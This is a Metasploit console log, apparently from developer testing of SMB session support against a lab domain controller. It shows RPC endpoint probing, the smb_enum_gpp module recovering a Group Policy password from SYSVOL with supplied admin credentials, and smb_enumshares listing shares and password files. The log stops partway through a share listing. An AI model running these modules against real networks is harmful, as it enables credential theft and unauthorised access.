UUID 9b8699ae-0e44-47b1-8e7f-86a461d7ecdc 0.0 ERROR Failed to bind. Could not bind to 9b8699ae-0e44-47b1-8e7f-86a461d7ecdc:0.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 9e8ee830-4459-11ce-979b-00aa005ffebe 2.0 ERROR Failed to bind. Could not bind to 9e8ee830-4459-11ce-979b-00aa005ffebe:2.0@ncacn_np:192.168.175.214[\BROWSER]
UUID a002b3a0-c9b7-11d1-ae88-0080c75e4ec1 1.0 ERROR Failed to bind. Could not bind to a002b3a0-c9b7-11d1-ae88-0080c75e4ec1:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID a00c021c-2be2-11d2-b678-0000f87a8f8e 1.0 ERROR Failed to bind. Could not bind to a00c021c-2be2-11d2-b678-0000f87a8f8e:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID a2d47257-12f7-4beb-8981-0ebfa935c407 1.0 ERROR Failed to bind. Could not bind to a2d47257-12f7-4beb-8981-0ebfa935c407:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID a398e520-d59a-4bdd-aa7a-3c1e0303a511 1.0 OPEN VIA BROWSER
UUID a3b749b1-e3d0-4967-a521-124055d1c37d 1.0 ERROR Failed to bind. Could not bind to a3b749b1-e3d0-4967-a521-124055d1c37d:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID a4c2fd60-5210-11d1-8fc2-00a024cb6019 1.0 ERROR Failed to bind. Could not bind to a4c2fd60-5210-11d1-8fc2-00a024cb6019:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID a4f1db00-ca47-1067-b31e-00dd010662da 1.0 ERROR Failed to bind. Could not bind to a4f1db00-ca47-1067-b31e-00dd010662da:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID a4f1db00-ca47-1067-b31f-00dd010662da 0.0 ERROR Failed to bind. Could not bind to a4f1db00-ca47-1067-b31f-00dd010662da:0.0@ncacn_np:192.168.175.214[\BROWSER]
UUID a4f1db00-ca47-1067-b31f-00dd010662da 0.81 ERROR Failed to bind. Could not bind to a4f1db00-ca47-1067-b31f-00dd010662da:0.81@ncacn_np:192.168.175.214[\BROWSER]
UUID aa177641-fc9b-41bd-80ff-f964a701596f 1.0 ERROR Failed to bind. Could not bind to aa177641-fc9b-41bd-80ff-f964a701596f:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID aa411582-9bdf-48fb-b42b-faa1eee33949 1.0 ERROR Failed to bind. Could not bind to aa411582-9bdf-48fb-b42b-faa1eee33949:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID aae9ac90-ce13-11cf-919e-08002be23c64 1.0 ERROR Failed to bind. Could not bind to aae9ac90-ce13-11cf-919e-08002be23c64:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID ae33069b-a2a8-46ee-a235-ddfd339be281 1.0 ERROR Failed to bind. Could not bind to ae33069b-a2a8-46ee-a235-ddfd339be281:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID afa8bd80-7d8a-11c9-bef4-08002b102989 1.0 OPEN VIA BROWSER
UUID b58aa02e-2884-4e97-8176-4ee06d794184 1.0 ERROR Failed to bind. Could not bind to b58aa02e-2884-4e97-8176-4ee06d794184:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID b97db8b2-4c63-11cf-bff6-08002be23f2f 2.0 ERROR Failed to bind. Could not bind to b97db8b2-4c63-11cf-bff6-08002be23f2f:2.0@ncacn_np:192.168.175.214[\BROWSER]
UUID b9e79e60-3d52-11ce-aaa1-00006901293f 0.2 ERROR Failed to bind. Could not bind to b9e79e60-3d52-11ce-aaa1-00006901293f:0.2@ncacn_np:192.168.175.214[\BROWSER]
UUID bfa951d1-2f0e-11d3-bfd1-00c04fa3490a 1.0 ERROR Failed to bind. Could not bind to bfa951d1-2f0e-11d3-bfd1-00c04fa3490a:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID c33b9f46-2088-4dbc-97e3-6125f127661c 1.0 ERROR Failed to bind. Could not bind to c33b9f46-2088-4dbc-97e3-6125f127661c:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID c681d488-d850-11d0-8c52-00c04fd90f7e 1.0 ERROR Failed to bind. Could not bind to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID c6f3ee72-ce7e-11d1-b71e-00c04fc3111a 1.0 ERROR Failed to bind. Could not bind to c6f3ee72-ce7e-11d1-b71e-00c04fc3111a:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID c8cb7687-e6d3-11d2-a958-00c04f682e16 1.0 ERROR Failed to bind. Could not bind to c8cb7687-e6d3-11d2-a958-00c04f682e16:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID c9378ff1-16f7-11d0-a0b2-00aa0061426a 1.0 ERROR Failed to bind. Could not bind to c9378ff1-16f7-11d0-a0b2-00aa0061426a:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID c9ac6db5-82b7-4e55-ae8a-e464ed7b4277 1.0 OPEN VIA BROWSER
UUID ce1334a5-41dd-40ea-881d-64326b23effe 0.2 ERROR Failed to bind. Could not bind to ce1334a5-41dd-40ea-881d-64326b23effe:0.2@ncacn_np:192.168.175.214[\BROWSER]
UUID d049b186-814f-11d1-9a3c-00c04fc9b232 1.1 ERROR Failed to bind. Could not bind to d049b186-814f-11d1-9a3c-00c04fc9b232:1.1@ncacn_np:192.168.175.214[\BROWSER]
UUID d2d79dfa-3400-11d0-b40b-00aa005ff586 1.0 ERROR Failed to bind. Could not bind to d2d79dfa-3400-11d0-b40b-00aa005ff586:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID d335b8f6-cb31-11d0-b0f9-006097ba4e54 1.5 ERROR Failed to bind. Could not bind to d335b8f6-cb31-11d0-b0f9-006097ba4e54:1.5@ncacn_np:192.168.175.214[\BROWSER]
UUID d3fbb514-0e3b-11cb-8fad-08002b1d29c3 1.0 ERROR Failed to bind. Could not bind to d3fbb514-0e3b-11cb-8fad-08002b1d29c3:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID d6d70ef0-0e3b-11cb-acc3-08002b1d29c3 1.0 ERROR Failed to bind. Could not bind to d6d70ef0-0e3b-11cb-acc3-08002b1d29c3:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID d6d70ef0-0e3b-11cb-acc3-08002b1d29c4 1.0 ERROR Failed to bind. Could not bind to d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID d7f9e1c0-2247-11d1-ba89-00c04fd91268 5.0 ERROR Failed to bind. Could not bind to d7f9e1c0-2247-11d1-ba89-00c04fd91268:5.0@ncacn_np:192.168.175.214[\BROWSER]
UUID d95afe70-a6d5-4259-822e-2c84da1ddb0d 1.0 ERROR Failed to bind. Could not bind to d95afe70-a6d5-4259-822e-2c84da1ddb0d:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID dd490425-5325-4565-b774-7e27d6c09c24 1.0 ERROR Failed to bind. Could not bind to dd490425-5325-4565-b774-7e27d6c09c24:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID e1af8308-5d1f-11c9-91a4-08002b14a0fa 3.0 ERROR Failed to bind. Could not bind to e1af8308-5d1f-11c9-91a4-08002b14a0fa:3.0@ncacn_np:192.168.175.214[\BROWSER]
UUID e248d0b8-bf15-11cf-8c5e-08002bb49649 2.0 ERROR Failed to bind. Could not bind to e248d0b8-bf15-11cf-8c5e-08002bb49649:2.0@ncacn_np:192.168.175.214[\BROWSER]
UUID e33c0cc4-0482-101a-bc0c-02608c6ba218 1.0 ERROR Failed to bind. Could not bind to e33c0cc4-0482-101a-bc0c-02608c6ba218:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID e3514235-4b06-11d1-ab04-00c04fc2dcd2 4.0 ERROR Failed to bind. Could not bind to e3514235-4b06-11d1-ab04-00c04fc2dcd2:4.0@ncacn_np:192.168.175.214[\BROWSER]
UUID e60c73e6-88f9-11cf-9af1-0020af6e72f4 2.0 ERROR Failed to bind. Could not bind to e60c73e6-88f9-11cf-9af1-0020af6e72f4:2.0@ncacn_np:192.168.175.214[\BROWSER]
UUID e67ab081-9844-3521-9d32-834f038001c0 1.0 ERROR Failed to bind. Could not bind to e67ab081-9844-3521-9d32-834f038001c0:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID e76ea56d-453f-11cf-bfec-08002be23f2f 2.0 ERROR Failed to bind. Could not bind to e76ea56d-453f-11cf-bfec-08002be23f2f:2.0@ncacn_np:192.168.175.214[\BROWSER]
UUID ea0a3165-4834-11d2-a6f8-00c04fa346cc 4.0 ERROR Failed to bind. Could not bind to ea0a3165-4834-11d2-a6f8-00c04fa346cc:4.0@ncacn_np:192.168.175.214[\BROWSER]
UUID ec02cae0-b9e0-11d2-be62-0020afeddf63 1.0 ERROR Failed to bind. Could not bind to ec02cae0-b9e0-11d2-be62-0020afeddf63:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID ecec0d70-a603-11d0-96b1-00a0c91ece30 1.0 ERROR Failed to bind. Could not bind to ecec0d70-a603-11d0-96b1-00a0c91ece30:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID ecec0d70-a603-11d0-96b1-00a0c91ece30 2.0 ERROR Failed to bind. Could not bind to ecec0d70-a603-11d0-96b1-00a0c91ece30:2.0@ncacn_np:192.168.175.214[\BROWSER]
UUID eff55e30-4ee2-11ce-a3c9-00aa00607271 1.0 ERROR Failed to bind. Could not bind to eff55e30-4ee2-11ce-a3c9-00aa00607271:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID f50aac00-c7f3-428e-a022-a6b71bfb9d43 1.0 ERROR Failed to bind. Could not bind to f50aac00-c7f3-428e-a022-a6b71bfb9d43:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID f5cc59b4-4264-101a-8c59-08002b2f8426 1.1 ERROR Failed to bind. Could not bind to f5cc59b4-4264-101a-8c59-08002b2f8426:1.1@ncacn_np:192.168.175.214[\BROWSER]
UUID f5cc5a18-4264-101a-8c59-08002b2f8426 56.0 ERROR Failed to bind. Could not bind to f5cc5a18-4264-101a-8c59-08002b2f8426:56.0@ncacn_np:192.168.175.214[\BROWSER]
UUID f5cc5a7c-4264-101a-8c59-08002b2f8426 21.0 ERROR Failed to bind. Could not bind to f5cc5a7c-4264-101a-8c59-08002b2f8426:21.0@ncacn_np:192.168.175.214[\BROWSER]
UUID f6beaff7-1e19-4fbb-9f8f-b89e2018337c 1.0 ERROR Failed to bind. Could not bind to f6beaff7-1e19-4fbb-9f8f-b89e2018337c:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID f930c514-1215-11d3-99a5-00a0c9b61b04 1.0 ERROR Failed to bind. Could not bind to f930c514-1215-11d3-99a5-00a0c9b61b04:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID fc13257d-5567-4dea-898d-c6f9c48415a0 1.0 ERROR Failed to bind. Could not bind to fc13257d-5567-4dea-898d-c6f9c48415a0:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID fd7a0523-dc70-43dd-9b2e-9c5ed48225b1 1.0 ERROR Failed to bind. Could not bind to fd7a0523-dc70-43dd-9b2e-9c5ed48225b1:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID fdb3a030-065f-11d1-bb9b-00a024ea5525 1.0 ERROR Failed to bind. Could not bind to fdb3a030-065f-11d1-bb9b-00a024ea5525:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID ffe561b8-bf15-11cf-8c5e-08002bb49649 2.0 ERROR Failed to bind. Could not bind to ffe561b8-bf15-11cf-8c5e-08002bb49649:2.0@ncacn_np:192.168.175.214[\BROWSER]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

scanner/smb/smb_enum_gpp

features set smb_session_type false

msf6 auxiliary(scanner/smb/smb_enum_gpp) > run smbuser=Administrator smbpass=Password1 rhosts=192.168.175.214 SMB::AlwaysEncrypt=false SMB::ProtocolVersion=2

[*] 192.168.175.214:445 - Connecting to the server...
[*] 192.168.175.214:445 - Mounting the remote share \\192.168.175.214\SYSVOL'...
[+] 192.168.175.214:445 - Found Policy Share on 192.168.175.214
[*] 192.168.175.214:445 - Parsing file: \\192.168.175.214\SYSVOL\vb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
[+] 192.168.175.214:445 - Group Policy Credential Info
============================

 Name               Value
 ----               -----
 TYPE               Groups.xml
 USERNAME           test
 PASSWORD           Super!!!Password
 DOMAIN CONTROLLER  192.168.175.214
 DOMAIN             vb.local
 CHANGED            2021-08-17 20:17:22
 NEVER_EXPIRES?     0
 DISABLED           0

[+] 192.168.175.214:445 - XML file saved to: /Users/cgranleese/.msf4/loot/20231214114711_default_192.168.175.214_microsoft.window_386709.txt
[+] 192.168.175.214:445 - Groups.xml saved as: /Users/cgranleese/.msf4/loot/20231214114711_default_192.168.175.214_smb.shares.file_216779.xml
[*] 192.168.175.214:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

features set smb_session_type true

Worked with rhost and creds, but not session

msf6 auxiliary(scanner/smb/smb_enum_gpp) > run session=1 SMB::AlwaysEncrypt=false SMB::ProtocolVersion=2

[*] Connecting to the server...
[*] Using existing session 1
[*] Mounting the remote share \\192.168.175.214\SYSVOL'...
[+] Found Policy Share on 192.168.175.214
[*] Parsing file: \\192.168.175.214\SYSVOL\vb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
[+] Group Policy Credential Info
============================

 Name               Value
 ----               -----
 TYPE               Groups.xml
 USERNAME           test
 PASSWORD           Super!!!Password
 DOMAIN CONTROLLER  192.168.175.214
 DOMAIN             vb.local
 CHANGED            2021-08-17 20:17:22
 NEVER_EXPIRES?     0
 DISABLED           0

[+] XML file saved to: /Users/cgranleese/.msf4/loot/20231214114319_default_192.168.175.214_microsoft.window_296911.txt
[-] 192.168.175.214: ActiveRecord::RecordInvalid Validation failed: Port is not a number, Port is not included in the list
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

scanner/smb/smb_enumshares

features set smb_session_type false

msf6 auxiliary(scanner/smb/smb_enumshares) > run

[-] 192.168.175.214:139 - Login Failed: Unable to negotiate SMB1 with the remote host: Not a valid SMB packet
[!] 192.168.175.214:445 - peer_native_os is only available with SMB1 (current version: SMB3)
[!] 192.168.175.214:445 - peer_native_lm is only available with SMB1 (current version: SMB3)
[+] 192.168.175.214:445 - ADMIN$ - (DISK|SPECIAL) Remote Admin
[+] 192.168.175.214:445 - C$ - (DISK|SPECIAL) Default share
[+] 192.168.175.214:445 - IPC$ - (IPC|SPECIAL) Remote IPC
[+] 192.168.175.214:445 - my_share - (DISK)
[+] 192.168.175.214:445 - NETLOGON - (DISK) Logon server share
[+] 192.168.175.214:445 - new_share_test - (DISK)
[+] 192.168.175.214:445 - SYSVOL - (DISK) Logon server share
[*] 192.168.175.214:445 - Skipping ADMIN$
[*] 192.168.175.214:445 - Skipping share C$ as it is of type DISK|SPECIAL
[*] 192.168.175.214:445 - Skipping share C$ as it is of type DISK|SPECIAL
[*] 192.168.175.214:445 - Skipping IPC$
[+] 192.168.175.214:445 -  \\VB\my_share
==============

 Type  Name            Created                    Accessed                   Written                    Changed                    Size
 ----  ----            -------                    --------                   -------                    -------                    ----
 DIR   New folder      2023-12-05T15:04:31+00:00  2023-12-05T15:07:07+00:00  2023-12-05T15:07:07+00:00  2023-12-05T15:07:07+00:00
 DIR   test_dir        2023-12-05T15:05:57+00:00  2023-12-05T15:07:26+00:00  2023-12-05T15:07:26+00:00  2023-12-05T15:07:26+00:00
 FILE  Passwords.txt   2022-10-12T11:41:51+01:00  2022-10-12T11:41:51+01:00  2022-10-12T11:41:51+01:00  2022-10-12T17:08:44+01:00  0
 FILE  paSsWords1.txt  2022-10-12T11:52:00+01:00  2022-10-12T11:52:00+01:00  2022-10-12T11:52:00+01:00  2022-10-12T17:08:59+01:00  0
 FILE  test.txt        2022-10-07T17:49:36+01:00  2022-10-07T17:49:36+01:00  2022-10-07T17:49:36+01:00  2022-10-07T17:49:39+01:00  0

[+] 192.168.175.214:445 -  \\VB\my_share\New folder
=========================

 Type  Name      Created                    Accessed                   Written                    Changed                    Size
 ----  ----      -------                    --------                   -------                    -------                    ----
 DIR   test      2023-12-05T15:06:57+00:00  2023-12-05T15:06:57+00:00  2023-12-05T15:06:57+00:00  2023-12-05T15:07:00+00:00
 FILE  test.txt  2023-12-05T15:07:05+00:00  2023-12-05T15:07:05+00:00  2023-12-05T15:07:05+00:00  2023-12-05T15:07:07+00:00  0

[+] 192.168.175.214:445 -  \\VB\my_share\test_dir
=======================

 Type  Name      Created                    Accessed                   Written                    Changed                    Size
 ----  ----      -------                    --------                   -------                    -------                    ----
 DIR   test      2023-12-05T15:07:18+00:00  2023-12-05T15:07:18+00:00  2023-12-05T15:07:18+00:00  2023-12-05T15:07:20+00:00
 FILE  test.txt  2023-12-05T15:07:24+00:00  2023-12-05T15:07:33+00:00  2023-12-05T15:07:33+00:00  2023-12-05T15:07:33+00:00  6

[+] 192.168.175.214:445 -  \\VB\new_share_test
====================

 Type  Name           Created                    Accessed                   Written                    Changed                    Size
 ----  ----           -------                    --------                   -------                    -------                    ----
 FILE  passwords.txt  2022-10-11T11:24:30+01:00  2022-10-11T11:24:30+01:00  2022-10-11T11:24:30+01:00  2022-10-12T13:24:58+01:00  0

[+] 192.168.175.214:445 -  \\VB\SYSVOL
============

 Type  Name      Created                    Accessed                   Written                    Changed                    Size
 ----  ----      -------                    --------                   -------                    -------                    ----
 DIR   vb.local  2022-09-15T15:19:10+01:00  2022-09-15T15:19:10+01:00  2022-09-15T15:19:10+01:00  2022-09-15T15:19:21+01:00

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local
=====================

 Type  Name         Created                    Accessed                   Written                    Changed                    Size
 ----  ----         -------                    --------                   -------                    -------                    ----
 DIR   DfsrPrivate  2022-09-15T15:25:38+01:00  2022-09-15T15:25:38+01:00  2022-09-15T15:25:38+01:00  2023-12-11T11:27:10+00:00
 DIR   Policies     2022-09-15T15:19:17+01:00  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00
 DIR   scripts      2022-09-15T15:19:10+01:00  2022-09-15T15:19:10+01:00  2022-09-15T15:19:10+01:00  2022-09-15T15:19:21+01:00

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\DfsrPrivate
=================================

 Type  Name                Created                    Accessed                   Written                    Changed                    Size
 ----  ----                -------                    --------                   -------                    -------                    ----
 DIR   ConflictAndDeleted  2022-09-15T15:25:38+01:00  2022-09-15T15:25:38+01:00  2022-09-15T15:25:38+01:00  2023-12-11T11:27:10+00:00
 DIR   Deleted             2022-09-15T15:25:38+01:00  2022-09-15T15:25:38+01:00  2022-09-15T15:25:38+01:00  2023-12-11T11:27:10+00:00
 DIR   Installing          2022-09-15T15:25:38+01:00  2022-09-15T15:25:38+01:00  2022-09-15T15:25:38+01:00  2023-12-11T11:27:10+00:00

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\Policies
==============================

 Type  Name                                    Created                    Accessed                   Written                    Changed                    Size
 ----  ----                                    -------                    --------                   -------                    -------                    ----
 DIR   {31B2F340-016D-11D2-945F-00C04FB984...  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:21+01:00
 DIR   {6AC1786C-016F-11D2-945F-00C04fB984...  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:21+01:00
 DIR   {6C3AD78B-3ABD-4636-8493-C6D7D9C5A4...  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
=====================================================================

 Type  Name     Created                    Accessed                   Written                    Changed                    Size
 ----  ----     -------                    --------                   -------                    -------                    ----
 DIR   MACHINE  2022-09-15T15:19:17+01:00  2022-09-15T15:26:41+01:00  2022-09-15T15:26:41+01:00  2022-09-15T15:26:41+01:00
 DIR   USER     2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:21+01:00
 FILE  GPT.INI  2022-09-15T15:19:17+01:00  2022-09-15T15:26:41+01:00  2022-09-15T15:26:41+01:00  2022-09-15T15:26:41+01:00  22

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
=====================================================================

 Type  Name     Created                    Accessed                   Written                    Changed                    Size
 ----  ----     -------                    --------                   -------                    -------                    ----
 DIR   MACHINE  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:21+01:00
 DIR   USER     2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:21+01:00
 FILE  GPT.INI  2022-09-15T15:19:17+01:00  2023-09-05T15:33:36+01:00  2023-09-05T15:33:36+01:00  2023-09-05T15:33:36+01:00  22

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\Policies\{6C3AD78B-3ABD-4636-8493-C6D7D9C5A471}
=====================================================================

 Type  Name     Created                    Accessed                   Written                    Changed                    Size
 ----  ----     -------                    --------                   -------                    -------                    ----
 DIR   Machine  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00
 DIR   User     2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00
 FILE  GPT.INI  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00  59

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE
=============================================================================

 Type  Name          Created                    Accessed                   Written                    Changed                    Size
 ----  ----          -------                    --------                   -------                    -------                    ----
 DIR   Microsoft     2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:21+01:00
 FILE  Registry.pol  2022-09-15T15:26:41+01:00  2022-09-15T15:26:41+01:00  2022-09-15T15:26:41+01:00  2022-09-15T15:26:41+01:00  2780

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE
=============================================================================

 Type  Name       Created                    Accessed                   Written                    Changed                    Size
 ----  ----       -------                    --------                   -------                    -------                    ----
 DIR   Microsoft  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:21+01:00

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft
=======================================================================================

 Type  Name        Created                    Accessed                   Written                    Changed                    Size
 ----  ----        -------                    --------                   -------                    -------                    ----
 DIR   Windows NT  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:21+01:00

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft
=======================================================================================

 Type  Name        Created                    Accessed                   Written                    Changed                    Size
 ----  ----        -------                    --------                   -------                    -------                    ----
 DIR   Windows NT  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:21+01:00

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT
==================================================================================================

 Type  Name     Created                    Accessed                   Written                    Changed                    Size
 ----  ----     -------                    --------                   -------                    -------                    ----
 DIR   SecEdit  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:21+01:00

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT
==================================================================================================

 Type  Name     Created                    Accessed                   Written                    Changed                    Size
 ----  ----     -------                    --------                   -------                    -------                    ----
 DIR   SecEdit  2022-09-15T15:19:17+01:00  2023-09-05T15:33:44+01:00  2023-09-05T15:33:36+01:00  2023-09-05T15:33:36+01:00

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
==========================================================================================================

 Type  Name         Created                    Accessed                   Written                    Changed                    Size
 ----  ----         -------                    --------                   -------                    -------                    ----
 FILE  GptTmpl.inf  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:21+01:00  1098

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
==========================================================================================================

 Type  Name         Created                    Accessed                   Written                    Changed                    Size
 ----  ----         -------                    --------                   -------                    -------                    ----
 FILE  GptTmpl.inf  2022-09-15T15:19:17+01:00  2023-09-05T15:33:36+01:00  2023-09-05T15:33:36+01:00  2023-09-05T15:33:36+01:00  6074

[+] 192.168.175.214:445 - info saved in: /Users/cgranleese/.msf4/loot/20231212151637_default_192.168.175.214_smb.enumshares_651715.txt
[*] 192.168.175.214: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_enumshares) >

features set smb_session_type true

msf6 auxiliary(scanner/smb/smb_enumshares) > run

[-] 192.168.175.214:139 - Login Failed: Unable to negotiate SMB1 with the remote host: Not a valid SMB packet
[!] 192.168.175.214:445 - peer_native_os is only available with SMB1 (current version: SMB3)
[!] 192.168.175.214:445 - peer_native_lm is only available with SMB1 (current version: SMB3)
[+] 192.168.175.214:445 - ADMIN$ - (DISK|SPECIAL) Remote Admin
[+] 192.168.175.214:445 - C$ - (DISK|SPECIAL) Default share
[+] 192.168.175.214:445 - IPC$ - (IPC|SPECIAL) Remote IPC
[+] 192.168.175.214:445 - my_share - (DISK)
[+] 192.168.175.214:445 - NETLOGON - (DISK) Logon server share
[+] 192.168.175.214:445 - new_share_test - (DISK)
[+] 192.168.175.214:445 - SYSVOL - (DISK) Logon server share
[*] 192.168.175.214:445 - Skipping ADMIN$
[*] 192.168.175.214:445 - Skipping share C$ as it is of type DISK|SPECIAL
[*] 192.168.175.214:445 - Skipping share C$ as it is of type DISK|SPECIAL
[*] 192.168.175.214:445 - Skipping IPC$
[+] 192.168.175.214:445 -  \\VB\my_share
==============

 Type  Name            Created                    Accessed                   Written                    Changed                    Size
 ----  ----            -------                    --------                   -------                    -------                    ----
 DIR   New folder      2023-12-05T15:04:31+00:00  2023-12-05T15:07:07+00:00  2023-12-05T15:07:07+00:00  2023-12-05T15:07:07+00:00
 DIR   test_dir        2023-12-05T15:05:57+00:00  2023-12-05T15:07:26+00:00  2023-12-05T15:07:26+00:00  2023-12-05T15:07:26+00:00
 FILE  Passwords.txt   2022-10-12T11:41:51+01:00  2022-10-12T11:41:51+01:00  2022-10-12T11:41:51+01:00  2022-10-12T17:08:44+01:00  0
 FILE  paSsWords1.txt  2022-10-12T11:52:00+01:00  2022-10-12T11:52:00+01:00  2022-10-12T11:52:00+01:00  2022-10-12T17:08:59+01:00  0
 FILE  test.txt        2022-10-07T17:49:36+01:00  2022-10-07T17:49:36+01:00  2022-10-07T17:49:36+01:00  2022-10-07T17:49:39+01:00  0

[+] 192.168.175.214:445 -  \\VB\my_share\New folder
=========================

 Type  Name      Created                    Accessed                   Written                    Changed                    Size
 ----  ----      -------                    --------                   -------                    -------                    ----
 DIR   test      2023-12-05T15:06:57+00:00  2023-12-05T15:06:57+00:00  2023-12-05T15:06:57+00:00  2023-12-05T15:07:00+00:00
 FILE  test.txt  2023-12-05T15:07:05+00:00  2023-12-05T15:07:05+00:00  2023-12-05T15:07:05+00:00  2023-12-05T15:07:07+00:00  0

[+] 192.168.175.214:445 -  \\VB\my_share\test_dir
=======================

 Type  Name      Created                    Accessed                   Written                    Changed                    Size
 ----  ----      -------                    --------                   -------                    -------                    ----
 DIR   test      2023-12-05T15:07:18+00:00  2023-12-05T15:07:18+00:00  2023-12-05T15:07:18+00:00  2023-12-05T15:07:20+00:00
 FILE  test.txt  2023-12-05T15:07:24+00:00  2023-12-05T15:07:33+00:00  2023-12-05T15:07:33+00:00  2023-12-05T15:07:33+00:00  6

[+] 192.168.175.214:445 -  \\VB\new_share_test
====================

 Type  Name           Created                    Accessed                   Written                    Changed                    Size
 ----  ----           -------                    --------                   -------                    -------                    ----
 FILE  passwords.txt  2022-10-11T11:24:30+01:00  2022-10-11T11:24:30+01:00  2022-10-11T11:24:30+01:00  2022-10-12T13:24:58+01:00  0

[+] 192.168.175.214:445 -  \\VB\SYSVOL
============

 Type  Name      Created                    Accessed                   Written                    Changed                    Size
 ----  ----      -------                    --------                   -------                    -------                    ----
